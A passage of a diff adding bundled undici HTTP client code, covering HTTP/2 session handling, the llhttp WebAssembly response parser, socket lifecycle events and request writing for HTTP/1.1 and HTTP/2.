onHttp2FrameError (type, code, id) { + const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) + + if (id === 0) { + this[kSocket][kError] = err + onError(this[kClient], err) + } +} + +function onHttp2SessionEnd () { + util.destroy(this, new SocketError('other side closed')) + util.destroy(this[kSocket], new SocketError('other side closed')) +} + +function onHTTP2GoAway (code) { + const client = this[kClient] + const err = new InformationalError(`HTTP/2: "GOAWAY" frame received with code ${code}`) + client[kSocket] = null + client[kHTTP2Session] = null + + if 
(client.destroyed) { + assert(this[kPending] === 0) + + // Fail entire queue. + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(this, request, err) + } + } else if (client[kRunning] > 0) { + // Fail head of pipeline. + const request = client[kQueue][client[kRunningIdx]] + client[kQueue][client[kRunningIdx]++] = null + + errorRequest(client, request, err) + } + + client[kPendingIdx] = client[kRunningIdx] + + assert(client[kRunning] === 0) + + client.emit('disconnect', + client[kUrl], + [client], + err + ) + + resume(client) +} + +const constants = __nccwpck_require__(953) +const createRedirectInterceptor = __nccwpck_require__(8861) +const EMPTY_BUF = Buffer.alloc(0) + +async function lazyllhttp () { + const llhttpWasmData = process.env.JEST_WORKER_ID ? __nccwpck_require__(1145) : undefined + + let mod + try { + mod = await WebAssembly.compile(Buffer.from(__nccwpck_require__(5627), 'base64')) + } catch (e) { + /* istanbul ignore next */ + + // We could check if the error was caused by the simd option not + // being enabled, but the occurring of this other error + // * https://github.com/emscripten-core/emscripten/issues/11495 + // got me to remove that check to avoid breaking Node 12. 
+ mod = await WebAssembly.compile(Buffer.from(llhttpWasmData || __nccwpck_require__(1145), 'base64')) + } + + return await WebAssembly.instantiate(mod, { + env: { + /* eslint-disable camelcase */ + + wasm_on_url: (p, at, len) => { + /* istanbul ignore next */ + return 0 + }, + wasm_on_status: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onStatus(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_message_begin: (p) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onMessageBegin() || 0 + }, + wasm_on_header_field: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onHeaderField(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_header_value: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onHeaderValue(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_headers_complete: (p, statusCode, upgrade, shouldKeepAlive) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onHeadersComplete(statusCode, Boolean(upgrade), Boolean(shouldKeepAlive)) || 0 + }, + wasm_on_body: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onBody(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_message_complete: (p) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onMessageComplete() || 0 + } + + /* eslint-enable camelcase */ + } + }) +} + +let llhttpInstance = null +let llhttpPromise = lazyllhttp() +llhttpPromise.catch() + +let currentParser = null +let currentBufferRef = null +let currentBufferSize = 0 +let currentBufferPtr = null + +const 
TIMEOUT_HEADERS = 1 +const TIMEOUT_BODY = 2 +const TIMEOUT_IDLE = 3 + +class Parser { + constructor (client, socket, { exports }) { + assert(Number.isFinite(client[kMaxHeadersSize]) && client[kMaxHeadersSize] > 0) + + this.llhttp = exports + this.ptr = this.llhttp.llhttp_alloc(constants.TYPE.RESPONSE) + this.client = client + this.socket = socket + this.timeout = null + this.timeoutValue = null + this.timeoutType = null + this.statusCode = null + this.statusText = '' + this.upgrade = false + this.headers = [] + this.headersSize = 0 + this.headersMaxSize = client[kMaxHeadersSize] + this.shouldKeepAlive = false + this.paused = false + this.resume = this.resume.bind(this) + + this.bytesRead = 0 + + this.keepAlive = '' + this.contentLength = '' + this.connection = '' + this.maxResponseSize = client[kMaxResponseSize] + } + + setTimeout (value, type) { + this.timeoutType = type + if (value !== this.timeoutValue) { + timers.clearTimeout(this.timeout) + if (value) { + this.timeout = timers.setTimeout(onParserTimeout, value, this) + // istanbul ignore else: only for jest + if (this.timeout.unref) { + this.timeout.unref() + } + } else { + this.timeout = null + } + this.timeoutValue = value + } else if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + } + + resume () { + if (this.socket.destroyed || !this.paused) { + return + } + + assert(this.ptr != null) + assert(currentParser == null) + + this.llhttp.llhttp_resume(this.ptr) + + assert(this.timeoutType === TIMEOUT_BODY) + if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + this.paused = false + this.execute(this.socket.read() || EMPTY_BUF) // Flush parser. 
+ this.readMore() + } + + readMore () { + while (!this.paused && this.ptr) { + const chunk = this.socket.read() + if (chunk === null) { + break + } + this.execute(chunk) + } + } + + execute (data) { + assert(this.ptr != null) + assert(currentParser == null) + assert(!this.paused) + + const { socket, llhttp } = this + + if (data.length > currentBufferSize) { + if (currentBufferPtr) { + llhttp.free(currentBufferPtr) + } + currentBufferSize = Math.ceil(data.length / 4096) * 4096 + currentBufferPtr = llhttp.malloc(currentBufferSize) + } + + new Uint8Array(llhttp.memory.buffer, currentBufferPtr, currentBufferSize).set(data) + + // Call `execute` on the wasm parser. + // We pass the `llhttp_parser` pointer address, the pointer address of buffer view data, + // and finally the length of bytes to parse. + // The return value is an error code or `constants.ERROR.OK`. + try { + let ret + + try { + currentBufferRef = data + currentParser = this + ret = llhttp.llhttp_execute(this.ptr, currentBufferPtr, data.length) + /* eslint-disable-next-line no-useless-catch */ + } catch (err) { + /* istanbul ignore next: difficult to make a test case for */ + throw err + } finally { + currentParser = null + currentBufferRef = null + } + + const offset = llhttp.llhttp_get_error_pos(this.ptr) - currentBufferPtr + + if (ret === constants.ERROR.PAUSED_UPGRADE) { + this.onUpgrade(data.slice(offset)) + } else if (ret === constants.ERROR.PAUSED) { + this.paused = true + socket.unshift(data.slice(offset)) + } else if (ret !== constants.ERROR.OK) { + const ptr = llhttp.llhttp_get_error_reason(this.ptr) + let message = '' + /* istanbul ignore else: difficult to make a test case for */ + if (ptr) { + const len = new Uint8Array(llhttp.memory.buffer, ptr).indexOf(0) + message = + 'Response does not match the HTTP/1.1 protocol (' + + Buffer.from(llhttp.memory.buffer, ptr, len).toString() + + ')' + } + throw new HTTPParserError(message, constants.ERROR[ret], data.slice(offset)) + } + } catch (err) { + 
util.destroy(socket, err) + } + } + + destroy () { + assert(this.ptr != null) + assert(currentParser == null) + + this.llhttp.llhttp_free(this.ptr) + this.ptr = null + + timers.clearTimeout(this.timeout) + this.timeout = null + this.timeoutValue = null + this.timeoutType = null + + this.paused = false + } + + onStatus (buf) { + this.statusText = buf.toString() + } + + onMessageBegin () { + const { socket, client } = this + + /* istanbul ignore next: difficult to make a test case for */ + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + if (!request) { + return -1 + } + } + + onHeaderField (buf) { + const len = this.headers.length + + if ((len & 1) === 0) { + this.headers.push(buf) + } else { + this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) + } + + this.trackHeader(buf.length) + } + + onHeaderValue (buf) { + let len = this.headers.length + + if ((len & 1) === 1) { + this.headers.push(buf) + len += 1 + } else { + this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) + } + + const key = this.headers[len - 2] + if (key.length === 10 && key.toString().toLowerCase() === 'keep-alive') { + this.keepAlive += buf.toString() + } else if (key.length === 10 && key.toString().toLowerCase() === 'connection') { + this.connection += buf.toString() + } else if (key.length === 14 && key.toString().toLowerCase() === 'content-length') { + this.contentLength += buf.toString() + } + + this.trackHeader(buf.length) + } + + trackHeader (len) { + this.headersSize += len + if (this.headersSize >= this.headersMaxSize) { + util.destroy(this.socket, new HeadersOverflowError()) + } + } + + onUpgrade (head) { + const { upgrade, client, socket, headers, statusCode } = this + + assert(upgrade) + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert(!socket.destroyed) + assert(socket === client[kSocket]) + assert(!this.paused) + assert(request.upgrade || request.method === 'CONNECT') + + 
this.statusCode = null + this.statusText = '' + this.shouldKeepAlive = null + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + socket.unshift(head) + + socket[kParser].destroy() + socket[kParser] = null + + socket[kClient] = null + socket[kError] = null + socket + .removeListener('error', onSocketError) + .removeListener('readable', onSocketReadable) + .removeListener('end', onSocketEnd) + .removeListener('close', onSocketClose) + + client[kSocket] = null + client[kQueue][client[kRunningIdx]++] = null + client.emit('disconnect', client[kUrl], [client], new InformationalError('upgrade')) + + try { + request.onUpgrade(statusCode, headers, socket) + } catch (err) { + util.destroy(socket, err) + } + + resume(client) + } + + onHeadersComplete (statusCode, upgrade, shouldKeepAlive) { + const { client, socket, headers, statusText } = this + + /* istanbul ignore next: difficult to make a test case for */ + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + + /* istanbul ignore next: difficult to make a test case for */ + if (!request) { + return -1 + } + + assert(!this.upgrade) + assert(this.statusCode < 200) + + if (statusCode === 100) { + util.destroy(socket, new SocketError('bad response', util.getSocketInfo(socket))) + return -1 + } + + /* this can only happen if server is misbehaving */ + if (upgrade && !request.upgrade) { + util.destroy(socket, new SocketError('bad upgrade', util.getSocketInfo(socket))) + return -1 + } + + assert.strictEqual(this.timeoutType, TIMEOUT_HEADERS) + + this.statusCode = statusCode + this.shouldKeepAlive = ( + shouldKeepAlive || + // Override llhttp value which does not allow keepAlive for HEAD. + (request.method === 'HEAD' && !socket[kReset] && this.connection.toLowerCase() === 'keep-alive') + ) + + if (this.statusCode >= 200) { + const bodyTimeout = request.bodyTimeout != null + ? 
request.bodyTimeout + : client[kBodyTimeout] + this.setTimeout(bodyTimeout, TIMEOUT_BODY) + } else if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + if (request.method === 'CONNECT') { + assert(client[kRunning] === 1) + this.upgrade = true + return 2 + } + + if (upgrade) { + assert(client[kRunning] === 1) + this.upgrade = true + return 2 + } + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + if (this.shouldKeepAlive && client[kPipelining]) { + const keepAliveTimeout = this.keepAlive ? util.parseKeepAliveTimeout(this.keepAlive) : null + + if (keepAliveTimeout != null) { + const timeout = Math.min( + keepAliveTimeout - client[kKeepAliveTimeoutThreshold], + client[kKeepAliveMaxTimeout] + ) + if (timeout <= 0) { + socket[kReset] = true + } else { + client[kKeepAliveTimeoutValue] = timeout + } + } else { + client[kKeepAliveTimeoutValue] = client[kKeepAliveDefaultTimeout] + } + } else { + // Stop more requests from being dispatched. + socket[kReset] = true + } + + const pause = request.onHeaders(statusCode, headers, this.resume, statusText) === false + + if (request.aborted) { + return -1 + } + + if (request.method === 'HEAD') { + return 1 + } + + if (statusCode < 200) { + return 1 + } + + if (socket[kBlocking]) { + socket[kBlocking] = false + resume(client) + } + + return pause ? 
constants.ERROR.PAUSED : 0 + } + + onBody (buf) { + const { client, socket, statusCode, maxResponseSize } = this + + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert.strictEqual(this.timeoutType, TIMEOUT_BODY) + if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + assert(statusCode >= 200) + + if (maxResponseSize > -1 && this.bytesRead + buf.length > maxResponseSize) { + util.destroy(socket, new ResponseExceededMaxSizeError()) + return -1 + } + + this.bytesRead += buf.length + + if (request.onData(buf) === false) { + return constants.ERROR.PAUSED + } + } + + onMessageComplete () { + const { client, socket, statusCode, upgrade, headers, contentLength, bytesRead, shouldKeepAlive } = this + + if (socket.destroyed && (!statusCode || shouldKeepAlive)) { + return -1 + } + + if (upgrade) { + return + } + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert(statusCode >= 100) + + this.statusCode = null + this.statusText = '' + this.bytesRead = 0 + this.contentLength = '' + this.keepAlive = '' + this.connection = '' + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + if (statusCode < 200) { + return + } + + /* istanbul ignore next: should be handled by llhttp? */ + if (request.method !== 'HEAD' && contentLength && bytesRead !== parseInt(contentLength, 10)) { + util.destroy(socket, new ResponseContentLengthMismatchError()) + return -1 + } + + request.onComplete(headers) + + client[kQueue][client[kRunningIdx]++] = null + + if (socket[kWriting]) { + assert.strictEqual(client[kRunning], 0) + // Response completed before request. 
+ util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (!shouldKeepAlive) { + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (socket[kReset] && client[kRunning] === 0) { + // Destroy socket once all requests have completed. + // The request at the tail of the pipeline is the one + // that requested reset and no further requests should + // have been queued since then. + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (client[kPipelining] === 1) { + // We must wait a full event loop cycle to reuse this socket to make sure + // that non-spec compliant servers are not closing the connection even if they + // said they won't. + setImmediate(resume, client) + } else { + resume(client) + } + } +} + +function onParserTimeout (parser) { + const { socket, timeoutType, client } = parser + + /* istanbul ignore else */ + if (timeoutType === TIMEOUT_HEADERS) { + if (!socket[kWriting] || socket.writableNeedDrain || client[kRunning] > 1) { + assert(!parser.paused, 'cannot be paused while waiting for headers') + util.destroy(socket, new HeadersTimeoutError()) + } + } else if (timeoutType === TIMEOUT_BODY) { + if (!parser.paused) { + util.destroy(socket, new BodyTimeoutError()) + } + } else if (timeoutType === TIMEOUT_IDLE) { + assert(client[kRunning] === 0 && client[kKeepAliveTimeoutValue]) + util.destroy(socket, new InformationalError('socket idle timeout')) + } +} + +function onSocketReadable () { + const { [kParser]: parser } = this + if (parser) { + parser.readMore() + } +} + +function onSocketError (err) { + const { [kClient]: client, [kParser]: parser } = this + + assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') + + if (client[kHTTPConnVersion] !== 'h2') { + // On Mac OS, we get an ECONNRESET even if there is a full body to be forwarded + // to the user. 
+ if (err.code === 'ECONNRESET' && parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so for as a valid response. + parser.onMessageComplete() + return + } + } + + this[kError] = err + + onError(this[kClient], err) +} + +function onError (client, err) { + if ( + client[kRunning] === 0 && + err.code !== 'UND_ERR_INFO' && + err.code !== 'UND_ERR_SOCKET' + ) { + // Error is not caused by running request and not a recoverable + // socket error. + + assert(client[kPendingIdx] === client[kRunningIdx]) + + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(client, request, err) + } + assert(client[kSize] === 0) + } +} + +function onSocketEnd () { + const { [kParser]: parser, [kClient]: client } = this + + if (client[kHTTPConnVersion] !== 'h2') { + if (parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so far as a valid response. + parser.onMessageComplete() + return + } + } + + util.destroy(this, new SocketError('other side closed', util.getSocketInfo(this))) +} + +function onSocketClose () { + const { [kClient]: client, [kParser]: parser } = this + + if (client[kHTTPConnVersion] === 'h1' && parser) { + if (!this[kError] && parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so far as a valid response. + parser.onMessageComplete() + } + + this[kParser].destroy() + this[kParser] = null + } + + const err = this[kError] || new SocketError('closed', util.getSocketInfo(this)) + + client[kSocket] = null + + if (client.destroyed) { + assert(client[kPending] === 0) + + // Fail entire queue. + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(client, request, err) + } + } else if (client[kRunning] > 0 && err.code !== 'UND_ERR_INFO') { + // Fail head of pipeline. 
+ const request = client[kQueue][client[kRunningIdx]] + client[kQueue][client[kRunningIdx]++] = null + + errorRequest(client, request, err) + } + + client[kPendingIdx] = client[kRunningIdx] + + assert(client[kRunning] === 0) + + client.emit('disconnect', client[kUrl], [client], err) + + resume(client) +} + +async function connect (client) { + assert(!client[kConnecting]) + assert(!client[kSocket]) + + let { host, hostname, protocol, port } = client[kUrl] + + // Resolve ipv6 + if (hostname[0] === '[') { + const idx = hostname.indexOf(']') + + assert(idx !== -1) + const ip = hostname.substring(1, idx) + + assert(net.isIP(ip)) + hostname = ip + } + + client[kConnecting] = true + + if (channels.beforeConnect.hasSubscribers) { + channels.beforeConnect.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector] + }) + } + + try { + const socket = await new Promise((resolve, reject) => { + client[kConnector]({ + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, (err, socket) => { + if (err) { + reject(err) + } else { + resolve(socket) + } + }) + }) + + if (client.destroyed) { + util.destroy(socket.on('error', () => {}), new ClientDestroyedError()) + return + } + + client[kConnecting] = false + + assert(socket) + + const isH2 = socket.alpnProtocol === 'h2' + if (isH2) { + if (!h2ExperimentalWarned) { + h2ExperimentalWarned = true + process.emitWarning('H2 support is experimental, expect them to change at any time.', { + code: 'UNDICI-H2' + }) + } + + const session = http2.connect(client[kUrl], { + createConnection: () => socket, + peerMaxConcurrentStreams: client[kHTTP2SessionState].maxConcurrentStreams + }) + + client[kHTTPConnVersion] = 'h2' + session[kClient] = client + session[kSocket] = socket + session.on('error', onHttp2SessionError) + session.on('frameError', onHttp2FrameError) + 
session.on('end', onHttp2SessionEnd) + session.on('goaway', onHTTP2GoAway) + session.on('close', onSocketClose) + session.unref() + + client[kHTTP2Session] = session + socket[kHTTP2Session] = session + } else { + if (!llhttpInstance) { + llhttpInstance = await llhttpPromise + llhttpPromise = null + } + + socket[kNoRef] = false + socket[kWriting] = false + socket[kReset] = false + socket[kBlocking] = false + socket[kParser] = new Parser(client, socket, llhttpInstance) + } + + socket[kCounter] = 0 + socket[kMaxRequests] = client[kMaxRequests] + socket[kClient] = client + socket[kError] = null + + socket + .on('error', onSocketError) + .on('readable', onSocketReadable) + .on('end', onSocketEnd) + .on('close', onSocketClose) + + client[kSocket] = socket + + if (channels.connected.hasSubscribers) { + channels.connected.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector], + socket + }) + } + client.emit('connect', client[kUrl], [client]) + } catch (err) { + if (client.destroyed) { + return + } + + client[kConnecting] = false + + if (channels.connectError.hasSubscribers) { + channels.connectError.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector], + error: err + }) + } + + if (err.code === 'ERR_TLS_CERT_ALTNAME_INVALID') { + assert(client[kRunning] === 0) + while (client[kPending] > 0 && client[kQueue][client[kPendingIdx]].servername === client[kServerName]) { + const request = client[kQueue][client[kPendingIdx]++] + errorRequest(client, request, err) + } + } else { + onError(client, err) + } + + client.emit('connectionError', client[kUrl], [client], err) + } + + resume(client) +} + +function emitDrain (client) { + client[kNeedDrain] = 0 + client.emit('drain', client[kUrl], [client]) +} + +function resume (client, sync) { 
+ if (client[kResuming] === 2) { + return + } + + client[kResuming] = 2 + + _resume(client, sync) + client[kResuming] = 0 + + if (client[kRunningIdx] > 256) { + client[kQueue].splice(0, client[kRunningIdx]) + client[kPendingIdx] -= client[kRunningIdx] + client[kRunningIdx] = 0 + } +} + +function _resume (client, sync) { + while (true) { + if (client.destroyed) { + assert(client[kPending] === 0) + return + } + + if (client[kClosedResolve] && !client[kSize]) { + client[kClosedResolve]() + client[kClosedResolve] = null + return + } + + const socket = client[kSocket] + + if (socket && !socket.destroyed && socket.alpnProtocol !== 'h2') { + if (client[kSize] === 0) { + if (!socket[kNoRef] && socket.unref) { + socket.unref() + socket[kNoRef] = true + } + } else if (socket[kNoRef] && socket.ref) { + socket.ref() + socket[kNoRef] = false + } + + if (client[kSize] === 0) { + if (socket[kParser].timeoutType !== TIMEOUT_IDLE) { + socket[kParser].setTimeout(client[kKeepAliveTimeoutValue], TIMEOUT_IDLE) + } + } else if (client[kRunning] > 0 && socket[kParser].statusCode < 200) { + if (socket[kParser].timeoutType !== TIMEOUT_HEADERS) { + const request = client[kQueue][client[kRunningIdx]] + const headersTimeout = request.headersTimeout != null + ? 
request.headersTimeout + : client[kHeadersTimeout] + socket[kParser].setTimeout(headersTimeout, TIMEOUT_HEADERS) + } + } + } + + if (client[kBusy]) { + client[kNeedDrain] = 2 + } else if (client[kNeedDrain] === 2) { + if (sync) { + client[kNeedDrain] = 1 + process.nextTick(emitDrain, client) + } else { + emitDrain(client) + } + continue + } + + if (client[kPending] === 0) { + return + } + + if (client[kRunning] >= (client[kPipelining] || 1)) { + return + } + + const request = client[kQueue][client[kPendingIdx]] + + if (client[kUrl].protocol === 'https:' && client[kServerName] !== request.servername) { + if (client[kRunning] > 0) { + return + } + + client[kServerName] = request.servername + + if (socket && socket.servername !== request.servername) { + util.destroy(socket, new InformationalError('servername changed')) + return + } + } + + if (client[kConnecting]) { + return + } + + if (!socket && !client[kHTTP2Session]) { + connect(client) + return + } + + if (socket.destroyed || socket[kWriting] || socket[kReset] || socket[kBlocking]) { + return + } + + if (client[kRunning] > 0 && !request.idempotent) { + // Non-idempotent request cannot be retried. + // Ensure that no other requests are inflight and + // could cause failure. + return + } + + if (client[kRunning] > 0 && (request.upgrade || request.method === 'CONNECT')) { + // Don't dispatch an upgrade until all preceding requests have completed. + // A misbehaving server might upgrade the connection before all pipelined + // request has completed. + return + } + + if (client[kRunning] > 0 && util.bodyLength(request.body) !== 0 && + (util.isStream(request.body) || util.isAsyncIterable(request.body))) { + // Request with stream or iterator body can error while other requests + // are inflight and indirectly error those as well. + // Ensure this doesn't happen by waiting for inflight + // to complete before dispatching. + + // Request with stream or iterator body cannot be retried. 
+ // Ensure that no other requests are inflight and + // could cause failure. + return + } + + if (!request.aborted && write(client, request)) { + client[kPendingIdx]++ + } else { + client[kQueue].splice(client[kPendingIdx], 1) + } + } +} + +// https://www.rfc-editor.org/rfc/rfc7230#section-3.3.2 +function shouldSendContentLength (method) { + return method !== 'GET' && method !== 'HEAD' && method !== 'OPTIONS' && method !== 'TRACE' && method !== 'CONNECT' +} + +function write (client, request) { + if (client[kHTTPConnVersion] === 'h2') { + writeH2(client, client[kHTTP2Session], request) + return + } + + const { body, method, path, host, upgrade, headers, blocking, reset } = request + + // https://tools.ietf.org/html/rfc7231#section-4.3.1 + // https://tools.ietf.org/html/rfc7231#section-4.3.2 + // https://tools.ietf.org/html/rfc7231#section-4.3.5 + + // Sending a payload body on a request that does not + // expect it can cause undefined behavior on some + // servers and corrupt connection state. Do not + // re-use the connection for further requests. + + const expectsPayload = ( + method === 'PUT' || + method === 'POST' || + method === 'PATCH' + ) + + if (body && typeof body.read === 'function') { + // Try to read EOF in order to get length. + body.read(0) + } + + const bodyLength = util.bodyLength(body) + + let contentLength = bodyLength + + if (contentLength === null) { + contentLength = request.contentLength + } + + if (contentLength === 0 && !expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD NOT send a Content-Length header field when + // the request message does not contain a payload body and the method + // semantics do not anticipate such a body. + + contentLength = null + } + + // https://github.com/nodejs/undici/issues/2046 + // A user agent may send a Content-Length header with 0 value, this should be allowed. 
+ if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength !== null && request.contentLength !== contentLength) { + if (client[kStrictContentLength]) { + errorRequest(client, request, new RequestContentLengthMismatchError()) + return false + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + const socket = client[kSocket] + + try { + request.onConnect((err) => { + if (request.aborted || request.completed) { + return + } + + errorRequest(client, request, err || new RequestAbortedError()) + + util.destroy(socket, new InformationalError('aborted')) + }) + } catch (err) { + errorRequest(client, request, err) + } + + if (request.aborted) { + return false + } + + if (method === 'HEAD') { + // https://github.com/mcollina/undici/issues/258 + // Close after a HEAD request to interop with misbehaving servers + // that may send a body in the response. + + socket[kReset] = true + } + + if (upgrade || method === 'CONNECT') { + // On CONNECT or upgrade, block pipeline from dispatching further + // requests on this connection. 
+ + socket[kReset] = true + } + + if (reset != null) { + socket[kReset] = reset + } + + if (client[kMaxRequests] && socket[kCounter]++ >= client[kMaxRequests]) { + socket[kReset] = true + } + + if (blocking) { + socket[kBlocking] = true + } + + let header = `${method} ${path} HTTP/1.1\r\n` + + if (typeof host === 'string') { + header += `host: ${host}\r\n` + } else { + header += client[kHostHeader] + } + + if (upgrade) { + header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` + } else if (client[kPipelining] && !socket[kReset]) { + header += 'connection: keep-alive\r\n' + } else { + header += 'connection: close\r\n' + } + + if (headers) { + header += headers + } + + if (channels.sendHeaders.hasSubscribers) { + channels.sendHeaders.publish({ request, headers: header, socket }) + } + + /* istanbul ignore else: assertion */ + if (!body || bodyLength === 0) { + if (contentLength === 0) { + socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') + } else { + assert(contentLength === null, 'no body must not have content length') + socket.write(`${header}\r\n`, 'latin1') + } + request.onRequestSent() + } else if (util.isBuffer(body)) { + assert(contentLength === body.byteLength, 'buffer body must have content length') + + socket.cork() + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + socket.write(body) + socket.uncork() + request.onBodySent(body) + request.onRequestSent() + if (!expectsPayload) { + socket[kReset] = true + } + } else if (util.isBlobLike(body)) { + if (typeof body.stream === 'function') { + writeIterable({ body: body.stream(), client, request, socket, contentLength, header, expectsPayload }) + } else { + writeBlob({ body, client, request, socket, contentLength, header, expectsPayload }) + } + } else if (util.isStream(body)) { + writeStream({ body, client, request, socket, contentLength, header, expectsPayload }) + } else if (util.isIterable(body)) { + writeIterable({ body, client, request, socket, contentLength, 
header, expectsPayload }) + } else { + assert(false) + } + + return true +} + +function writeH2 (client, session, request) { + const { body, method, path, host, upgrade, expectContinue, signal, headers: reqHeaders } = request + + let headers + if (typeof reqHeaders === 'string') headers = Request[kHTTP2CopyHeaders](reqHeaders.trim()) + else headers = reqHeaders + + if (upgrade) { + errorRequest(client, request, new Error('Upgrade not supported for H2')) + return false + } + + try { + // TODO(HTTP/2): Should we call onConnect immediately or on stream ready event? + request.onConnect((err) => { + if (request.aborted || request.completed) { + return + } + + errorRequest(client, request, err || new RequestAbortedError()) + }) + } catch (err) { + errorRequest(client, request, err) + } + + if (request.aborted) { + return false + } + + /** @type {import('node:http2').ClientHttp2Stream} */ + let stream + const h2State = client[kHTTP2SessionState] + + headers[HTTP2_HEADER_AUTHORITY] = host || client[kHost] + headers[HTTP2_HEADER_METHOD] = method + + if (method === 'CONNECT') { + session.ref() + // we are already connected, streams are pending, first request + // will create a new stream. 
We trigger a request to create the stream and wait until + // `ready` event is triggered + // We disabled endStream to allow the user to write to the stream + stream = session.request(headers, { endStream: false, signal }) + + if (stream.id && !stream.pending) { + request.onUpgrade(null, null, stream) + ++h2State.openStreams + } else { + stream.once('ready', () => { + request.onUpgrade(null, null, stream) + ++h2State.openStreams + }) + } + + stream.once('close', () => { + h2State.openStreams -= 1 + // TODO(HTTP/2): unref only if current streams count is 0 + if (h2State.openStreams === 0) session.unref() + }) + + return true + } + + // https://tools.ietf.org/html/rfc7540#section-8.3 + // :path and :scheme headers must be omited when sending CONNECT + + headers[HTTP2_HEADER_PATH] = path + headers[HTTP2_HEADER_SCHEME] = 'https' + + // https://tools.ietf.org/html/rfc7231#section-4.3.1 + // https://tools.ietf.org/html/rfc7231#section-4.3.2 + // https://tools.ietf.org/html/rfc7231#section-4.3.5 + + // Sending a payload body on a request that does not + // expect it can cause undefined behavior on some + // servers and corrupt connection state. Do not + // re-use the connection for further requests. + + const expectsPayload = ( + method === 'PUT' || + method === 'POST' || + method === 'PATCH' + ) + + if (body && typeof body.read === 'function') { + // Try to read EOF in order to get length. + body.read(0) + } + + let contentLength = util.bodyLength(body) + + if (contentLength == null) { + contentLength = request.contentLength + } + + if (contentLength === 0 || !expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD NOT send a Content-Length header field when + // the request message does not contain a payload body and the method + // semantics do not anticipate such a body. 
+ + contentLength = null + } + + // https://github.com/nodejs/undici/issues/2046 + // A user agent may send a Content-Length header with 0 value, this should be allowed. + if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength != null && request.contentLength !== contentLength) { + if (client[kStrictContentLength]) { + errorRequest(client, request, new RequestContentLengthMismatchError()) + return false + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + if (contentLength != null) { + assert(body, 'no body must not have content length') + headers[HTTP2_HEADER_CONTENT_LENGTH] = `${contentLength}` + } + + session.ref() + + const shouldEndStream = method === 'GET' || method === 'HEAD' + if (expectContinue) { + headers[HTTP2_HEADER_EXPECT] = '100-continue' + stream = session.request(headers, { endStream: shouldEndStream, signal }) + + stream.once('continue', writeBodyH2) + } else { + stream = session.request(headers, { + endStream: shouldEndStream, + signal + }) + writeBodyH2() + } + + // Increment counter as we have new several streams open + ++h2State.openStreams + + stream.once('response', headers => { + const { [HTTP2_HEADER_STATUS]: statusCode, ...realHeaders } = headers + + if (request.onHeaders(Number(statusCode), realHeaders, stream.resume.bind(stream), '') === false) { + stream.pause() + } + }) + + stream.once('end', () => { + request.onComplete([]) + }) + + stream.on('data', (chunk) => { + if (request.onData(chunk) === false) { + stream.pause() + } + }) + + stream.once('close', () => { + h2State.openStreams -= 1 + 